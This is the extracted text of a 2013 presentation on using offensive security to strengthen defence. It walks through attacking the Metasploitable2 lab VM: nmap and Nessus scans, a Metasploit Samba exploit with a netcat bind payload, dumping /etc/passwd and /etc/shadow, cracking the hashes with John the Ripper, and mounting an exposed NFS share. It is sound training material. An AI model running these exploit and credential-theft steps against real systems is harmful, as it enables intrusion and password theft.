[2024]Digital Global Overview Report 2024 Meltwater.pdf
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
1. “Improving your defensive security posture with offensive security strategies”
Andrew Kozma
HTCIA, Atlantic Chapter
Meeting April 18th, 2013
2. A bit about me…
Infosec professional working in healthcare
Co-founder of AtlSecCon
Midnight ethical hacker
A perpetual student
Security researcher/philosopher
Fan of the blues (Secretly want to learn how to play the harmonica)
3. Offensive Security
“How much can you know about yourself if you've never been in
a fight?”
~Chuck Palahniuk, Fight Club
Hacking our own infrastructure to improve defensive security
measures and processes
Tools – Kali Linux, a security distro maintained by Offensive-
Security with all the tools required to test security, it’s free and
always will be
Tactics – The application of tools
Strategy – The big picture, all the pieces working together to
achieve an ultimate goal
4. Creating a practice environment
“The first rule of fight club is, you don't talk about fight club.”
~Chuck Palahniuk, Fight Club
The goal - a controlled environment where it is safe to
practice offensive security techniques
There are many vulnerable distributions that can serve as
targets to help build skills (@g0tmi1k’s www.vulnhub.com)
With proper planning and authorization along with an
understanding of the risks you can test production
infrastructure
Virtualization is a beautiful thing!
5.
6. Demo (metasploitable2)
NMAP Scan
Identify OS, Services and open ports
Nessus Vuln Scan
Run a scan to find vulnerabilities that can potentially be
exploited
Metasploit console
Import the info
Exploit the target
Post exploitation
Crack passwords with john
PWN the box
7. Demo (nmap)
• Scanning with nmap
-O OS Detection
-sV Service Version
-sC NSE Scripts
-oX Output in xml format
--stylesheet nmap.xsl
--open
--reason
• Copying the stylesheet to our
working directory
• Displaying the nmap scan in
Iceweasel (Kali-Linux Browser)
9. Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux
• Download and install
• dpkg –i “filename”
• Register for Home feed (free)
• Connect to Local host port 8834
• Login and select new scan
10. Demo (Nessus)
• Launch the scan
• Nessus indicates the scan
progress
• A summary is displayed
once the scan is complete
13. Demo (metasploit)
• Opening the Metasploit
Framework Console
• Enter the command
“msfconsole”
• Importing our nmap scan
results into the metasploit
database
• Enter the command
“db_import /path to the
nmap scan”
14. Demo (metasploit)
• We can validate the
db_import by entering the
command “hosts” at the msf
prompt
• We can also validate the
services imported for that
host from nmap by entering
the command “services” at an
msf prompt.
15. Demo (metasploit)
• Import the nessus scan into
metasploit with command
“db_import /path to the file”
• Now that it is imported into
metasploit we can view the
vulnerabilities that nessus
detected with the command
“vulns”
16. Demo (metasploit)
• For this demo we are going to
exploit samba
• Load the exploit in msf with the
command:
“use exploit/multi/samba/usermap_script”
• Once the exploit is loaded we can
learn more about its functions via
the command “info”
17. Demo (metasploit)
• The command:
“show options” indicates
any variables that require
a value to be set
• For this exploit a Remote
Host is required to be
identified. We will use the
command:
“set RHOST target.ip.address”
• A payload that will be
delivered to the target is
required we issue the
command “set PAYLOAD
cmd/unix/bind/netcat”
18. Demo (metasploit)
• The command “show options” now
indicates the variables for RHOST
and PAYLOAD that we previously
defined
19. Demo (metasploit)
• We attack the target via the
command “exploit”
• Booyah! Shell access to the target!
• We have root level access to the
target and interact via this shell
• Let’s display the target systems
user accounts via the command
“cat /etc/passwd”
• We are going to select the data
displayed and copy it to a .txt file
20. Demo (metasploit)
• Now we need to grab the
hashes associated with the user
accounts we just viewed
• This can be done by displaying
the hashes via the command
“cat /etc/shadow”
• Once again we will be selecting
the information displayed and
will be copying it to a .txt file
22. Demo (John The Ripper)
• We are going to use John The
Ripper to crack the passwords for
the user accounts
• For John to crack them we have
to combine the usernames and
their hash into a format that John
can understand
• We combine both files to a single
one for John to crack with the
command: “unshadow
/path/passwd.txt /path/shadow.txt
> unshadowed.txt”
• We now have a file with
usernames and hashes that John
can use
23. Demo (John The Ripper)
• We are going to take a quick peek
at the contents of the new file
• To do this we change to directory
the file resides in “cd HTCIA”
• We can display the contents of this
file in the terminal with the
command “cat unshadowed.txt”
24. Demo (John The Ripper)
• To start cracking the password
with John we issue the
command: “john /path to the
filename.txt”
• John has loaded the hashes
and has successfully cracked
some of the passwords
• Previously cracked passwords
can be viewed with the
command: “john –show /Path
to the file.txt”
25. Demo (Post Exploitation)
• Using our new creds to SSH to
the exploited workstation
• To connect via SSH we use the
command: “ssh –l msfadmin
Target.IP.Address”
• Now we have a terminal session
vs a shell
• In the real world we could
continue to install backdoors,
steal data, pivot to scan for other
hosts
26. Demo (Post Exploitation)
• Lets review other services so that we can maintain a persistent
presence on the compromised workstation
• Hmmm NFS services are running on the target…
27. Demo (Post Exploitation)
• Lets take a quick look at
the NFS share available
on the target
• Uh oh… everything is
shared
• We are going to create a
temp directory and then
mount the share in it
• Lets display the filesystem
to see the NFS share
mounted in temp
28. Demo (Post Exploitation)
• Looking into the share that we
mounted…
• We already know we can copy the
contents of the passwd and
shadow files again
29. Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as
possible during the information
gathering phase…
• Sometimes you get lucky! The
VNC server password was
identified in the scan by Nessus
30. Breaking things to make them better
“At the time, my life just seemed too complete, and maybe we
have to break everything to make something better out of
ourselves.” ~Chuck
Palahniuk, Fight Club
When you start looking at production systems it is important to
have a demonstrated, repeatable process that has buy in from
management
Document your findings indicating the threat, the likelihood of
occurrence and the impact to the business
Use this information to build business cases for investment in
security solutions
When you start looking at the production environment… there
will be blood….
31.
32. Advanced Persistent Response
“On a long enough time line, the survival rate for everyone
drops to zero.” ~Chuck Palahniuk, Fight Club
Understanding trends and current threats
Filling in the gaps with security (Technology and process)
Creating and implementing a security model that meets
organizational needs
33. Incident Response
"With a gun barrel between your teeth, you speak only in vowels.“
~Chuck Palahniuk, Fight Club
Preparation
Have a plan, know who to call and when
Identification
Determination of whether or not there was an incident
Containment
Protecting other critical systems “stop the bleeding”
Eradication
Addressing the vulnerabilities that were exploited
Recovery
Returning to operational status
Follow up
Lessons learned, prevent future incidents of the same nature
34. Parting thoughts
Do you still think the best defense is a
good offense?
IMHO ~ A good offense helps to make a
great defense! (with proper planning and execution)
35. References
Jeremy Druin @webpwnized has a great tutorial online going into more detail:
http://www.youtube.com/watch?v=0fbBwGAuINw
@netbiosx has a tutorial available online regarding NFS and metasploitable2:
http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/
Nessus software and home feed licensing can be found on their site:
http://www.tenable.com/
Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security
Metasploitable2 is maintained by Rapid7 and is available for download from:
https://community.rapid7.com/docs/DOC-1875
Why stop here! There are many other distros to help expand your skillset, check out
@g0tmi1k and his website at http://vulnhub.com/